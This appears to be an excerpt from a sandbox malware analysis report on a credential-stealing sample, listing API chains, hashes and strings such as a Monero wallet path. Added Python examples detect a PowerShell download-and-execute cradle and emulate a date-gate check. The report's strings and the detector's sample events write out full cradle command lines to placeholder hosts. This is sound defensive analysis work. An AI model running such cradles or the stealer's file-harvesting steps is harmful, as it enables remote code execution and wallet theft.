                                  • Opcode Fuzzy Hash: 2da70650d72dde656404721c9cceb16a7d534bcda6f421c752966b63d7f7ac7e
                                  • Instruction Fuzzy Hash: 243118B4E00209EFDB24CF94D885BAE7BF9FF48310F108158E915A7294D778A981DFA1
                                  APIs
                                  • lstrcat.KERNEL32(?,016FDF28), ref: 00F747DB
                                    • Part of subcall function 00F78DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F78E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00F74801
                                  • lstrcat.KERNEL32(?,?), ref: 00F74820
                                  • lstrcat.KERNEL32(?,?), ref: 00F74834
                                  • lstrcat.KERNEL32(?,016EB1A8), ref: 00F74847
                                  • lstrcat.KERNEL32(?,?), ref: 00F7485B
                                  • lstrcat.KERNEL32(?,016FD3B8), ref: 00F7486F
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                    • Part of subcall function 00F78D90: GetFileAttributesA.KERNEL32(00000000,?,00F61B54,?,?,00F8564C,?,?,00F80E1F), ref: 00F78D9F
                                    • Part of subcall function 00F74570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00F74580
                                    • Part of subcall function 00F74570: RtlAllocateHeap.NTDLL(00000000), ref: 00F74587
                                    • Part of subcall function 00F74570: wsprintfA.USER32 ref: 00F745A6
                                    • Part of subcall function 00F74570: FindFirstFileA.KERNEL32(?,?), ref: 00F745BD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                  • String ID:
                                  • API String ID: 2540262943-0
                                  • Opcode ID: 7b64a68ddc035d8b3d6079899e05f9144b83d74976b51fa9b31979276eb6adcc
                                  • Instruction ID: 3172c5169126142cf0298c850ae287ca102dcc9a51e1a1633810110f949bb994
                                  • Opcode Fuzzy Hash: 7b64a68ddc035d8b3d6079899e05f9144b83d74976b51fa9b31979276eb6adcc
                                  • Instruction Fuzzy Hash: 913194B294020857CB64F7B0DC89EED777CAF48700F40859AB31996081EE7897C9DB92
                                  APIs
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                    • Part of subcall function 00F7A920: lstrcpy.KERNEL32(00000000,?), ref: 00F7A972
                                    • Part of subcall function 00F7A920: lstrcat.KERNEL32(00000000), ref: 00F7A982
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00F72D85
                                  Strings
                                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00F72CC4
                                  • <, xrefs: 00F72D39
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00F72D04
                                  • ')", xrefs: 00F72CB3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  • API String ID: 3031569214-898575020
                                  • Opcode ID: cb105ed64ecba78dd7b546717338db6d0c48ae53f36941b5cb37f61f3afb22e1
                                  • Instruction ID: bfeb51f8d88c0f0c6927261ecfa3ede44a9e8a9db6914013651bf85e9f32a847
                                  • Opcode Fuzzy Hash: cb105ed64ecba78dd7b546717338db6d0c48ae53f36941b5cb37f61f3afb22e1
                                  • Instruction Fuzzy Hash: D141C171C101089ADB54FBA0CC95FDEBB74AF50300F41812AE11AA7191DF786A5AEF93
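The Strings and API list of this routine show how the sample launches a second stage: it concatenates the fragments `-nop -c "iex(New-Object Net.WebClient).DownloadString('`, a URL, and `')"` into one command line and hands it to the hardcoded `C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe` through ShellExecuteEx, so the child is always 32-bit PowerShell. The URL itself is not among the strings the report lists. The Python below is an added detection example and is neither part of the report nor code from the sample: it matches that cradle, and loosely rewritten forms of it, in process-creation records. The event dicts, field names (Sysmon Event ID 1 style), parent images and URLs are constructed here for illustration.

```python
import re
from dataclasses import dataclass

# String fragments listed in the report for the ShellExecuteEx routine above.
CRADLE_PREFIX = "-nop -c \"iex(New-Object Net.WebClient).DownloadString('"
CRADLE_SUFFIX = "')\""
POWERSHELL_WOW64 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"

# Looser pattern so trivial rewrites of the same cradle (Invoke-Expression spelled
# out, System.Net.WebClient, extra spaces, double quotes) are still caught.
CRADLE_RE = re.compile(
    r"""(?ix)
    (?:iex|invoke-expression)\s*\(?\s*
    \(?\s*new-object\s+(?:system\.)?net\.webclient\s*\)?
    \s*\.\s*downloadstring\s*\(\s*(['"])(?P<url>[^'"]+)\1\s*\)
    """
)


@dataclass
class CradleHit:
    image: str               # process image that ran the cradle
    url: str                 # second-stage URL handed to DownloadString
    exact_sample_form: bool  # byte-for-byte the prefix/suffix seen in this sample
    wow64_powershell: bool   # 32-bit PowerShell, as this 32-bit sample spawns it


def scan_process_events(events):
    """Return a CradleHit for every process-creation event whose command line
    carries a WebClient.DownloadString download-and-execute cradle.
    `events` are dicts with at least 'Image' and 'CommandLine' keys; nothing
    is read from a live log source."""
    hits = []
    for ev in events:
        cmd = ev.get("CommandLine", "")
        m = CRADLE_RE.search(cmd)
        if m is None:
            continue
        image = ev.get("Image", "")
        hits.append(CradleHit(
            image=image,
            url=m.group("url"),
            exact_sample_form=CRADLE_PREFIX in cmd and cmd.rstrip().endswith(CRADLE_SUFFIX),
            wow64_powershell=image.lower() == POWERSHELL_WOW64.lower(),
        ))
    return hits


# Constructed sample events (not from the report); URLs are placeholders.
SAMPLE_EVENTS = [
    {   # the exact form this routine builds
        "Image": POWERSHELL_WOW64,
        "ParentImage": r"C:\Users\user\Desktop\file.exe",
        "CommandLine": POWERSHELL_WOW64 + " " + CRADLE_PREFIX
        + "http://example.invalid/stage2.ps1" + CRADLE_SUFFIX,
    },
    {   # same cradle rewritten, launched by a 64-bit host
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": 'powershell.exe -w hidden -c "Invoke-Expression ((New-Object '
        "System.Net.WebClient).DownloadString('https://example.invalid/a'))\"",
    },
    {   # benign PowerShell use, no cradle
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "powershell.exe -NoProfile -File C:\\scripts\\inventory.ps1",
    },
]

if __name__ == "__main__":
    for hit in scan_process_events(SAMPLE_EVENTS):
        print(hit)
```

The `exact_sample_form` flag is the high-confidence signal tied to this sample's string table; the regex hit on its own is a broader "download cradle" indicator that should be joined with parent-process context (here a user-profile executable spawning SysWOW64 PowerShell) before it is treated as Stealc specifically.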
                                  APIs
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00F69F41
                                    • Part of subcall function 00F7A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F7A7E6
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$AllocLocal
                                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                  • API String ID: 4171519190-1096346117
                                  • Opcode ID: f58019a3ceebbc182c1a167ae86fcd6872576fdc4c6aafde45ab0eb4210dae26
                                  • Instruction ID: f36c505345f6282f8cb163d5303ff6eba33efbe3db2fb155ac6e31af47db490e
                                  • Opcode Fuzzy Hash: f58019a3ceebbc182c1a167ae86fcd6872576fdc4c6aafde45ab0eb4210dae26
                                  • Instruction Fuzzy Hash: BD613471A00248EBDB28EFA4CC96FED7775BF84304F448119F90A5F191DB786A06EB52
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,016FD378,00000000,00020119,?), ref: 00F740F4
                                  • RegQueryValueExA.ADVAPI32(?,016FDFB8,00000000,00000000,00000000,000000FF), ref: 00F74118
                                  • RegCloseKey.ADVAPI32(?), ref: 00F74122
                                  • lstrcat.KERNEL32(?,00000000), ref: 00F74147
                                  • lstrcat.KERNEL32(?,016FDFD0), ref: 00F7415B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseOpenQueryValue
                                  • String ID:
                                  • API String ID: 690832082-0
                                  • Opcode ID: b36c8a11f438ad85383c9a9811ab5a007fd836f623d548d647f368d78bf453f2
                                  • Instruction ID: 44ee069b32f32d1aa15b87af0feb645b0d262a4e078b0c8271b331be186e4216
                                  • Opcode Fuzzy Hash: b36c8a11f438ad85383c9a9811ab5a007fd836f623d548d647f368d78bf453f2
                                  • Instruction Fuzzy Hash: 1441DB7690010867DB28EBA0EC46FFE773CBB88300F448559B62A57185EA755B88DB92
                                  APIs
                                  • GetSystemTime.KERNEL32(?), ref: 00F7696C
                                  • sscanf.NTDLL ref: 00F76999
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00F769B2
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00F769C0
                                  • ExitProcess.KERNEL32 ref: 00F769DA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Time$System$File$ExitProcesssscanf
                                  • String ID:
                                  • API String ID: 2533653975-0
                                  • Opcode ID: 8d402dd3cd16b29a48a632b618bb9dae050fa652a25ba5096a643d46797656cf
                                  • Instruction ID: ac6f5b269b0bda6193b82edde238bae5085eb44d01be53786ef214d185c1c3fc
                                  • Opcode Fuzzy Hash: 8d402dd3cd16b29a48a632b618bb9dae050fa652a25ba5096a643d46797656cf
                                  • Instruction Fuzzy Hash: 7021FC75D00208ABCF48EFE4E9459EEBBB9FF48300F04852EE51AE3244EB345608CB65
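The API chain of this routine (GetSystemTime, sscanf, two SystemTimeToFileTime calls, ExitProcess) has the shape of a date gate: parse a hardcoded date, convert both that date and the current time to FILETIME so they compare as 64-bit integers, and terminate when the current time is on the wrong side of it. The report shows neither the date string, the sscanf format, nor the comparison direction, so the Python below is an added illustration of that logic with those three points assumed (YYYY-MM-DD, exit once the date has passed); it is not code recovered from the sample and not part of the report. The FILETIME conversion itself is the documented Windows definition. The date values used are constructed.

```python
import re
from datetime import datetime, timedelta, timezone

# FILETIME counts 100-nanosecond ticks since 1601-01-01 00:00:00 UTC.
_FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
TICKS_PER_SECOND = 10_000_000


def utc_date(year, month, day):
    """Small constructor for aware UTC dates (keeps the examples readable)."""
    return datetime(year, month, day, tzinfo=timezone.utc)


def systemtime_to_filetime(dt):
    """Equivalent of SystemTimeToFileTime for an aware datetime. Integer
    arithmetic so the 64-bit tick count is exact (float seconds would not be)."""
    if dt.tzinfo is None:
        dt = dt.replace(tzinfo=timezone.utc)
    delta = dt - _FILETIME_EPOCH
    return (delta.days * 86_400 + delta.seconds) * TICKS_PER_SECOND + delta.microseconds * 10


def parse_expiry(text):
    """Stand-in for the sample's sscanf call. The YYYY-MM-DD layout is an
    assumption; the report does not show the format string. Returns None on
    garbage or an impossible calendar date, as a failed sscanf would."""
    m = re.fullmatch(r"\s*(\d{4})-(\d{1,2})-(\d{1,2})\s*", text)
    if m is None:
        return None
    year, month, day = (int(g) for g in m.groups())
    try:
        return utc_date(year, month, day)
    except ValueError:
        return None


def gate_says_exit(expiry_text, now):
    """True when a gate of this shape would call ExitProcess: parse the date,
    convert both dates to FILETIME, compare as integers. Exiting once the date
    has passed is the usual meaning of such a check and an assumption here."""
    expiry = parse_expiry(expiry_text)
    if expiry is None:
        return False  # unparsable date: assume the gate cannot trigger
    return systemtime_to_filetime(now) > systemtime_to_filetime(expiry)


def sandbox_clock_for(expiry_text, days_before=1):
    """Analyst side: a clock value to set in the sandbox so the gate stays
    open, or None if the date string does not parse."""
    expiry = parse_expiry(expiry_text)
    return None if expiry is None else expiry - timedelta(days=days_before)


if __name__ == "__main__":
    # Constructed values; the sample's real expiry string is not in the report.
    expiry = "2024-10-01"
    for day in (utc_date(2024, 9, 30), utc_date(2024, 10, 2)):
        print(day.date(), "-> ExitProcess" if gate_says_exit(expiry, day) else "-> continue")
    print("run the sandbox with its clock at", sandbox_clock_for(expiry))
```

The practical point is the last function: when a detonation ends almost immediately with this API sequence in the trace, re-run it with the guest clock set before the parsed date rather than concluding the sample is inert.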
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F77E37
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00F77E3E
                                  • RegOpenKeyExA.ADVAPI32(80000002,016EBB98,00000000,00020119,?), ref: 00F77E5E
                                  • RegQueryValueExA.ADVAPI32(?,016FD258,00000000,00000000,000000FF,000000FF), ref: 00F77E7F
                                  • RegCloseKey.ADVAPI32(?), ref: 00F77E92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: 47cad2d29734a290a115ac19e9ccd74ea5ef15511758018b0196c415d4ca5ff7
                                  • Instruction ID: ab12549527fec2028a2e596509851a58aa22d5ce9d3a0f2be74123d6878651c4
                                  • Opcode Fuzzy Hash: 47cad2d29734a290a115ac19e9ccd74ea5ef15511758018b0196c415d4ca5ff7
                                  • Instruction Fuzzy Hash: 661191B2A44205EBD714DFD4E849FBBBFB8EB04B11F10812AF616A7284D7785840DBA1
                                  APIs
                                  • StrStrA.SHLWAPI(016FDCE8,?,?,?,00F7140C,?,016FDCE8,00000000), ref: 00F7926C
                                  • lstrcpyn.KERNEL32(011AAB88,016FDCE8,016FDCE8,?,00F7140C,?,016FDCE8), ref: 00F79290
                                  • lstrlen.KERNEL32(?,?,00F7140C,?,016FDCE8), ref: 00F792A7
                                  • wsprintfA.USER32 ref: 00F792C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  Similarity
                                  • API ID: lstrcpynlstrlenwsprintf
                                  • String ID: %s%s
                                  • API String ID: 1206339513-3252725368
                                  • Opcode ID: 7cfafafe67e4d8725f1e1666210eef9680a7a10620c42a04112f48587ba1d9a1
                                  • Instruction ID: 7b284c658eb4401f5d2b72cfd3896d5f33175bdd904a73d30e1bb99a14077a17
                                  • Opcode Fuzzy Hash: 7cfafafe67e4d8725f1e1666210eef9680a7a10620c42a04112f48587ba1d9a1
                                  • Instruction Fuzzy Hash: 7701E575500208FFCB08DFE8E984EAE7FB9EF48350F508548F90A9B205C671AA80DB90
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F612B4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00F612BB
                                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00F612D7
                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00F612F5
                                  • RegCloseKey.ADVAPI32(?), ref: 00F612FF
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: 71673948818d429be9365231e0dd0882986f514fce60a63dd5fc56cf246f2f87
                                  • Instruction ID: 065d33ff1d17f54791cb825033cac17bed09a0f29a9f3eca1361616a45736d19
                                  • Opcode Fuzzy Hash: 71673948818d429be9365231e0dd0882986f514fce60a63dd5fc56cf246f2f87
                                  • Instruction Fuzzy Hash: 1A0131B9A40208BFDB14DFE0E849FAEBBB8EF48701F408169FA15D7284D6759A41CF50
                                  APIs
                                  Strings
                                  Similarity
                                  • API ID: String___crt$Type
                                  • String ID:
                                  • API String ID: 2109742289-3916222277
                                  • Opcode ID: 7a68b4fcad7c0955143952dbee74fae2b937dbd774e9b21c184eedffbf33d83a
                                  • Instruction ID: b5ba5c36ff77cb520442f873c90edb0ee1f49995c8c97480b859aa947fe8bb9c
                                  • Opcode Fuzzy Hash: 7a68b4fcad7c0955143952dbee74fae2b937dbd774e9b21c184eedffbf33d83a
                                  • Instruction Fuzzy Hash: 3941F6B150075C5EDB318B248C84FFBBFF99F45704F1484EDEA8E86182D2719A44AFA2
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00F76663
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00F76726
                                  • ExitProcess.KERNEL32 ref: 00F76755
                                  Strings
                                  Similarity
                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                  • String ID: <
                                  • API String ID: 1148417306-4251816714
                                  • Opcode ID: 09261c60422306ebf58c14db9f73bddb488f0c6c77f00e2e892e47e1e6498136
                                  • Instruction ID: a65bf02495400ff312f7171758f73dd9e8d9ad1929c06f75f008aa2459a87479
                                  • Opcode Fuzzy Hash: 09261c60422306ebf58c14db9f73bddb488f0c6c77f00e2e892e47e1e6498136
                                  • Instruction Fuzzy Hash: DF3121B18012189BDB58EB90DC95FDE7B78AF44300F80819AF31967181DF786B89DF56
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00F80E28,00000000,?), ref: 00F7882F
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00F78836
                                  • wsprintfA.USER32 ref: 00F78850
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                  Strings
                                  Similarity
                                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                                  • String ID: %dx%d
                                  • API String ID: 1695172769-2206825331
                                  • Opcode ID: 3f6ffff450bde1aaf64bd6c5a1e05da6e35e638264fc7f2a9a1531d66e28d60e
                                  • Instruction ID: ca2ca47efb084f1c064a4c09edd30b6e6d404a2fd5bd62dfc59bf4bd3f867a48
                                  • Opcode Fuzzy Hash: 3f6ffff450bde1aaf64bd6c5a1e05da6e35e638264fc7f2a9a1531d66e28d60e
                                  • Instruction Fuzzy Hash: AB2130B1A40204AFDB18DFD4ED49FAEBBB8FF48B01F504129F615A7284C7799941CBA1
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00F7951E,00000000), ref: 00F78D5B
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00F78D62
                                  • wsprintfW.USER32 ref: 00F78D78
                                  Strings
                                  Similarity
                                  • API ID: Heap$AllocateProcesswsprintf
                                  • String ID: %hs
                                  • API String ID: 769748085-2783943728
                                  • Opcode ID: 4693fa9439a4b58a89b9ab17d382b080e38346b15ac4ffb19ba4836f7b0bf605
                                  • Instruction ID: 24d5e9e2528919ea05572b0750ca696641b0581bdcaf9d56681286beb8c1adb3
                                  • Opcode Fuzzy Hash: 4693fa9439a4b58a89b9ab17d382b080e38346b15ac4ffb19ba4836f7b0bf605
